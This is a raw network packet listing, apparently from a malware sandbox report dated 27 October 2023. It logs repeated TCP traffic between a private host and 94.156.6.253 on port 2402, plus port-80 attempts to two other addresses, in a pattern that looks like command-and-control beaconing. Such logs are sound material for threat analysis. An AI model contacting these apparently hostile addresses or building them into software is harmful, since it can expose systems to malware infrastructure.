                                                                                                                                              Oct 27, 2023 16:20:32.396133900 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.396166086 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.396213055 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.396220922 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.396270990 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.396284103 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.396331072 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.396575928 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.436256886 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.436336994 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.436604977 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.590585947 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.590657949 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.590835094 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.590890884 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.590930939 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.590992928 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591046095 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591080904 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591209888 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591248035 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591305017 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591356993 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591411114 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591463089 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591520071 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591526985 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591573954 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591614008 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591670990 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591722965 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591731071 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591795921 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591833115 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.591870070 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591923952 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.591975927 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592015028 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592132092 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592159986 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592220068 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592278004 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592283010 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592348099 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592401981 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592453957 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592468977 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592528105 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592536926 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592602968 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592655897 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592691898 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592731953 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592850924 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.592859030 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.592972994 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593028069 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593080044 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593108892 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593158007 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593173981 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593233109 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593333006 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593388081 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593434095 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593463898 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593485117 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593539000 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593592882 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593627930 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593671083 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593724966 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593811035 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593851089 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593899965 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.593924046 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.593978882 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594032049 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594084024 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594136000 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.594209909 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594239950 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.594337940 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594440937 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594448090 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.594562054 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594589949 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.594640970 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594693899 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.594799042 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.594856024 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595020056 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.595232964 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595330954 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595385075 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595437050 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595474005 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.595597982 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595612049 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595643997 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595650911 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.595820904 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.595856905 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595890045 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.595947981 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596016884 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596036911 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596072912 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596093893 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596177101 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596266985 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596288919 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596318960 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596426964 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596471071 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596515894 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596601009 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596688986 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596894026 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596941948 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.596965075 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596977949 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.596990108 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597002983 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597014904 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597027063 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597070932 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597095013 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.597158909 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597172022 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597238064 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.597268105 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597320080 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597419977 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.597549915 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.597687960 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597791910 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597888947 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597943068 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.597953081 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598053932 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598140001 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598174095 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598273993 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598287106 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598316908 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598330975 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598433018 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598499060 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598517895 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598573923 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598576069 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598591089 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598603010 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598643064 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598694086 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598764896 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.598810911 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598862886 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.598911047 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599014997 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599067926 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599123001 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.599152088 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599265099 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599292040 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.599390984 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599442959 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599447966 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.599579096 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599603891 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.599893093 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.599997044 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600111008 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.600130081 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600145102 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600157022 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600168943 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600182056 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600193024 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600204945 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600217104 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600229025 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600266933 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.600276947 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600414038 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.600447893 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600591898 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.600605011 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600642920 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600785971 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.600821018 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600975037 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.600991011 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601017952 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601134062 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.601241112 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.601274967 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601382971 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601397991 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601411104 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601444960 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601515055 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601516962 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.601569891 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601639986 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601670980 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.601773024 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.601840019 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.601887941 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602013111 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602087021 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.602219105 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602231979 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602263927 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602402925 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.602426052 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602493048 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.602526903 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602540016 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602613926 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.602672100 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.602762938 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.602894068 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.603015900 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.603100061 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.603141069 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.603192091 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.603244066 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.651869059 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:32.673791885 CEST8049745217.147.225.69192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:32.673954010 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:20:36.999489069 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:37.238014936 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.238265991 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.238356113 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:37.238429070 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:37.238476992 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:37.238569975 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.238814116 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.239016056 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.476125956 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.476306915 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.476491928 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.482690096 CEST24024974794.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:37.482851982 CEST497472402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:55.478811979 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:20:55.521801949 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:55.528418064 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:20:55.811265945 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:21:25.502295017 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:21:25.503997087 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:21:25.795543909 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:21:55.547377110 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:21:55.548983097 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:21:55.842381954 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:22:14.536174059 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:14.536174059 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:15.147450924 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:15.285723925 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:16.363624096 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:16.785303116 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:18.800606966 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:19.769197941 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:23.658961058 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:25.628065109 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:22:25.629602909 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:22:25.720994949 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:25.920546055 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:22:33.375500917 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:37.624515057 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:22:52.808631897 CEST4974880192.168.11.20178.237.33.50
                                                                                                                                              Oct 27, 2023 16:22:55.657183886 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:22:55.658432961 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:22:55.951910019 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:23:01.416121006 CEST4974580192.168.11.20217.147.225.69
                                                                                                                                              Oct 27, 2023 16:23:26.026655912 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:23:26.028220892 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:23:26.311299086 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:23:56.069582939 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:23:56.070877075 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:23:56.373704910 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:24:26.110878944 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:24:26.112169981 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:24:26.404978037 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:24:56.457922935 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:24:56.459134102 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:24:56.764502048 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:25:26.499665022 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:25:26.500968933 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:25:26.795701981 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:25:56.556638002 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:25:56.558149099 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:25:56.842665911 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:26:26.908660889 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:26:26.909694910 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:26:27.201998949 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:26:57.279386997 CEST24024974694.156.6.253192.168.11.20
                                                                                                                                              Oct 27, 2023 16:26:57.280397892 CEST497462402192.168.11.2094.156.6.253
                                                                                                                                              Oct 27, 2023 16:26:57.576992035 CEST24024974694.156.6.253192.168.11.20
